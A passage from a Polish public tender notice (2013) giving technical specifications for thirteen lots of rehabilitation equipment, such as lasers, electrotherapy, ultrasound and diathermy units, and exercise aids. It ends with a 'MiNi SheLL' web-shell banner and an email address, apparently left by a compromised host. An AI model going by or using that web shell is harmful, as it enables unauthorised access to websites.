16.Termin gwarancji min. 12 miesięcy  TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wysokoenergetyczny laser biostymulacyjny - szt. 1
1  Typ źródła -  laser diodowy   TAK
2 Długość fali światła w zakresie biostymulacyjnym 800nm i 970 nm +- 15nm  TAK
3 Moc max. CW  12.0 W +-3%  TAK
4 Moc min. CW  0.1 W +-3%  TAK
5 Moc (Intense Super Pulse) pozwalająca redukować efekt termiczny i zwiększać głębokość działania laseroterapii regulowana do 15W  TAK
6 Modalność emisji promieniowania CW (fale ciągłe) lub modulowane (1Hz do 20 kHz, cykle pracy do 50%) lub ISP (Intense Super Pulse)  TAK
7 Kolorowy ekran dotykowy  TAK
8 Rozmiar (szerokość, długość, wysokość) 180 x 200 x 190 mm +- 10%  TAK
9 Laser przenośny. Waga max. 1300g (z baterią i sterownikiem) TAK
10 Dwie pary okularów ochronnych do laseroterapii w zestawie TAK
11 Rękojeść z regulowaną z wiązką optyczną i ręcznym przełącznikiem TAK
12 Baza jednostek chorobowych  TAK
13 Możliwość tworzenia i zapisywania własnych terapii TAK
14 klasa II, typ B wg DIN EN ISO 60601-1:2006 o bezpieczeństwie elektrycznym TAK
15 klasa IIb wg dyrektywy 93)42)CEE o sprzęcie medycznym  TAK
16 klasa B wg IEC 60601-1-2:2007 o kompatybilmości elektromagnetycznej  TAK
17 klasa lasera IV wg DIN EN 60825-1:2008 o urządzeniach laserowych  TAK
18 Instrukcja obsługi w języku polskim  TAK
19 Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu. TAK
20 Termin gwarancji min. 12 miesięcy TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat do elektroterapii szt. 1
1 Kolorowy ekran dotykowy minimum 10 TAK
2 Leksykon leczenia zawierający charakterystyki schorzeń, proponowane sposoby leczenia, zdjęcia pokazujące sposób wykonywania terapii TAK
3 Możliwość rozszerzenia leksykonu leczenia TAK
4 Dowolnie programowalna pamięć TAK
5 Kartoteka pacjentów TAK
6 Prądy przeciwbólowe, interferencja dwubiegunowa, prądy Kotza, asymetryczny dwufazowy prąd impulsowy, symetryczny dwufazowy prąd impulsowy, prąd impulsowy prostokątny, prąd impulsowy  trójkątny, mikroprądy, HV, prądy diadynamiczne, przerywany prąd stały o średniej częstotliwości, ciągły galwaniczny prąd stały, TENS burst , napięcie stałe ) prąd stały, wektor dipolowy, wektor izoplanarny, wektor manualny, klasyczna interferencja, automatyczny wektor dipolowy, półfale sinusoidalne, prąd progowy, prąd eksponencjalny, prąd Träberta (UR), TENS)HV, TENS)Częstotliwość średnia, prąd średniej częstotliwości o przebiegu sinusoidalnym, prąd udarowy. TAK
7 Duże możliwości regulacji parametrów wykonywanych zabiegów. TAK
8 Dwa kanały do terapii prądami w zależności od potrzeb zależne bądź w pełni niezależne od siebie. TAK
9 Elektrodiagnostyka TAK
10 Ciągły podgląd pracy wszystkich kanałów urządzenia ( 2 kanały elektroterapii) oraz urządzeń podłączonych (vacuum)  TAK
11 Wskazanie oddanej mocy: stale widoczne na wyświetlaczu TAK
12 Wskazanie przyłączenia  TAK
13 Wskazanie pozostałego czasu trwania zabiegu  TAK
14 Możliwość podłączenia akumulatora TAK
15 Pobór mocy: do 20 W TAK
16 Zasilanie: 230V)50 Hz TAK
17 Masa: do 2,8 kg TAK
18 Wymiary 290 x 120 x 265 mm +- 5% TAK
19 Instrukcja obsługi w języku polskim TAK
20 Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu. TAK
21 Termin gwarancji min. 12 miesięcy TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat do ultrafonoforezy  szt. 1
1 Kolorowy ekran dotykowy min. 10 cali TAK
2 Leksykon leczenia zawierający charakterystyki schorzeń, proponowane sposoby leczenia, zdjęcia pokazujące sposób wykonywania terapii TAK
3 Możliwość rozszerzenia Leksykonu leczenia TAK
4 Dowolnie programowalna pamięć TAK
5 Kartoteka pacjentów TAK
6 Duże możliwości regulacji parametrów wykonywanych zabiegów. TAK
7 Ciągły podgląd pracy wszystkich kanałów urządzenia  TAK
8 Wieloczęstotliwościowa głowica ultradźwiękowa 1)3 MHz, pow. 4 cm2  TAK
9 Moc ultradźwięków - emisja ciągła: 2 W)cm2 przy częstotliwości 1 MHz; 1 W)cm2 przy częstotliwości 3 MHz TAK
10 Moc ultradźwięków - emisja impulsowa: 3 W/cm2 przy częstotliwości 1 MHz; 2 W)cm2 przy częstotliwości 3 MHz TAK
11 Czas trwania impulsu: 2,4,6,10 ms TAK
12 Czas trwania przerwy: 20 ms  TAK
13 Wskazanie oddanej mocy: stale widoczne na wyświetlaczu TAK
14 Wskazanie przyłączenia: tak  TAK
15 Wskazanie pozostałego czasu trwania zabiegu: tak  TAK
16 ERA (skutecznie promieniująca powierzchnia): 3,6 cm2 +- 10%  TAK
17 Możliwość podłączenia akumulatora TAK
18 Pobór mocy: do 20 W  TAK
19 Zasilanie: 230V)50 Hz TAK
20 Masa: do 3,5 kg  TAK
21 Wymiary 290 x 120 x 265 mm +- 5%  TAK
22 Instrukcja obsługi w języku polskim TAK
23 Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu. TAK
24 Termin gwarancji min. 12 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Osprzęt do UGUL (linki, podwieszki, obciążniki) kpl. 1

1 Linka długość 1600 mm     szt. 8  TAK
2 Linka długość  960 mm     szt. 6 TAK
3 Linka długość 2450 mm     szt. 1 TAK
4 Linka długość 5720 mm     szt. 1 TAK
5 Linka długość 3750 mm     szt. 3 TAK
6 Podwieszka przedramion i podudzi 100x420 szt. 4 TAK
7 Podwieszka ud i ramion  145x540 szt. 4  TAK
8 Podwieszka pod miednicę 230x750 szt. 2 TAK
9 Podwieszka klatki piersiowej 225x675)340x100 szt. 1 TAK
10 Podwieszka pod głowę 150x530 szt. 1 TAK
11 Podwieszka stóp 75x610 szt. 4 TAK
12 Podwieszka dwustawowa pelota 160x80 pas 40x1350 szt. 4 TAK
13 Pas do wyciągu za miednicęę uniwersalny 1330x170 szt. 1  TAK
14 Kamaszek szt. 1 TAK
15 Ciężarek miękki 0,5 kg szt. 2  TAK
16 Ciężarek miękki 1,0 kg szt. 2 TAK
17 Ciężarek miękki 1,5 kg szt. 2 TAK
18 Ciężarek miękki 2,0 kg szt. 2 TAK
19 Ciężarek miękki 2,5 kg szt. 2 TAK
20 Ciężarek miękki 3,0 kg szt. 1 TAK
21 Esik szt. 30 TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zadanie nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dysk sensoryczny, korekcyjny szt. 1
TAK
1 Średnica 33 cmTAK
2 Wypełniony powietrzem  TAK
3 Posiadający wypustki z jednej strony o wysokości około 5mm TAK
4 Gładki ze strony drugiej TAK
5 Zaworek pozwalający na regulację twardości TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> zadanie nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przyrząd do ćwiczeń stawu skokowego (krzyżak) szt. 1

1 Do ćwiczeń stawu skokowego wolnych i z obciążeniem w osi wzdłużnej i poprzecznej stopy TAK
2 Możliwość blokady obrotu stopy wokół każdej z osi oraz nakładanie obciążeń w tych kierunkach. TAK
3 Obciążniki  - 4 szt. - 1kg. TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> zadanie nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wałki rehabilitacyjne szt. 2
1 Wałek duży: średnica 40-50 cm, długość 60 cm, materiał zmywalny  szt. 1 TAK
2 Wałek długi: średnica 30 cm, długość 60 cm , materiał zmywalny  szt. 1 TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> zadanie nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materac rehabilitacyjny 3-częściowy, składany szt. 2

1 wymiary: 195-200 cm x 100 cm x 5cm TAK
2 twardość pianki R-70 TAK
3 składany 3-częściowy TAK
4 materac obszyty materiałem skóropodobnym TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> zadanie nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Komplet taśm rehabilitacyjnych kpl. 2

1 Komplet szt. 1  taśm mniejszego oporu składający się z 3 szt. taśm
Taśmy: żółta, czerwona, zielona.
Wszystkie 3 taśmy o długości 1,5 m. TAK
2 Komplet szt. 1 taśm większego oporu składający się z 2 szt. taśm.
Taśmy: niebieska, czarna.
Wszystkie 2 taśmy o długości 1,5 m. TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> zadanie nr 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szyna do ćwiczeń biernych kończyny dolnej szt. 1
1 Szyna do ćwiczeń biernych kończyny dolnej TAK
2 Bierna mobilizacja st. biodrowego w zakresie 10°do70°  i kolanowego w zakresie min.  0°do110° TAK
3 Bierna mobilizacja stawu skokowego w zakresie min. 20°do -40° TAK
4 Automatyczne zwiększanie wyprostu, zgięcia TAK
5 Funkcja rozgrzewki TAK
6 Możliwość współpracy z kartą pamięci TAK
7 Karta pamięci - 10 szt. TAK
8 Wózek transportowy pod urządzenie TAK
9 Możliwość regulacji siły i czasu trwania ćwiczeń TAK
10 Możliwość regulacji prędkości ruchu TAK
11 Ergonomiczna i solidna konstrukcja pozwalająca na wygodne transportowanie urządzenia TAK
12 Pilot umożliwiający pacjentowi przerwanie ruchu TAK
13 Możliwość regulacji długości poszczególnych elementów, pozwalających na bardzo dokładne umiejscowienie osi obrotu ruch TAK
14 Instrukcja obsługi w języku polskim TAK
15 Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu. TAK
16 Termin gwarancji min. 12 miesięcy TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> zadanie nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Diatermia krótkofalowa szt. 1
1 Diatermia kondensatorowa i indukcyjna  TAK
2 Ekranowane elektrody, przewody elektrod, oraz generatory TAK
3 Czteroprzegubowe ramiona elektrod umożliwiający duży zakres ustawień TAK
4 Znamionowa częstotliwość: 27,12 MHz TAK
5 Ekwiwalent mocy 400 W TAK
6 Moc na wejściu RF (-praca ciągła - 200W, nastawiana skokowo; - praca impulsowa - 30 W, nastawiana skokowo) TAK
7 Parametry impulsów (- częstotliwość powtarzania impulsów - 70 Hz( 350Hz; - szerokość impulsów - 2 ms (0,4 ms; moc w szczycie - 400 W) TAK
8 Czas ekspozycji: 0d 0 do 30 min. nastawiany skokowo TAK
9 Praca diatermii jest cały czas kontrolowana przez mikroprocesor TAK
10 Kontrola prawidłowości ustawień pacjenta względem elektrod TAK
11 Aparat po uruchomieniu przeprowadza autotest i potwierdza swą gotowość do pracy TAK
12 Każda nieprawidłowość w pracy urządzenia lub błąd w obsłudze sygnalizowany jest dźwiękowo i na wyświetlaczu. TAK
13 Podczas wystąpienia nieprawidłowości urządzenie zeruje wartość emitowanej dawki
TAK
14 Wymiary (wys. x szer. x głęb.)
85 x 38 x 38 cm +- 3% TAK
15 Masa 40 kg +- 3% TAK
16 Napięcie 230 V TAK
17 Pobór mocy 700 VA TAK
18 Pobór mocy przy pracy jałowej 100 VA TAK
19 Klasa ochronności i typ ochrony IP 20 BF TAK
20 Wyposażenie:
1) Triploda 15 x 35  cm +- 3%
2)Elektroda indukcyjna śr. 140 mm += 3% 1 szt.
3) Przewód do elektrody indukcyjnej szt. 2   TAK
21 Instrukcja obsługi w języku polskim   TAK
22 Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu.  TAK
23 Termin gwarancji min. 12 miesięcy TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> zadanie nr 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fotel do ćwiczeń stawu kolanowego szt. 1
1 przeznaczony do ćwiczeń wspomaganych biernych i czynnych wolnych i z oporem stawów kolanowych   TAK
2 wyposażonych w dwie głowice do ćwiczeń oporowych TAK
3 wyposażony w pas do stabilizacji ud, miednicy i klatki piersiowej TAK
4 wysokość siedziska 70 cm (+-5 %)  TAK
5   wysokość całkowita 155 cm (+-5%) TAK
6 masa max 50 kg  TAK
7 szerokość siedziska 54 cm (+- 5%) TAK
8 długość rozłożonego fotela 168 cm (+- 5%) TAK
9 obciążenie 10 kg (+- 5%) TAK
10 Instrukcja obsługi w języku polskim TAK
11 Dostawca przeprowadzi szkolenie personelu z zakresu obsługi aparatu. TAK
12 Termin gwarancji min. 12 miesięcy TAK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com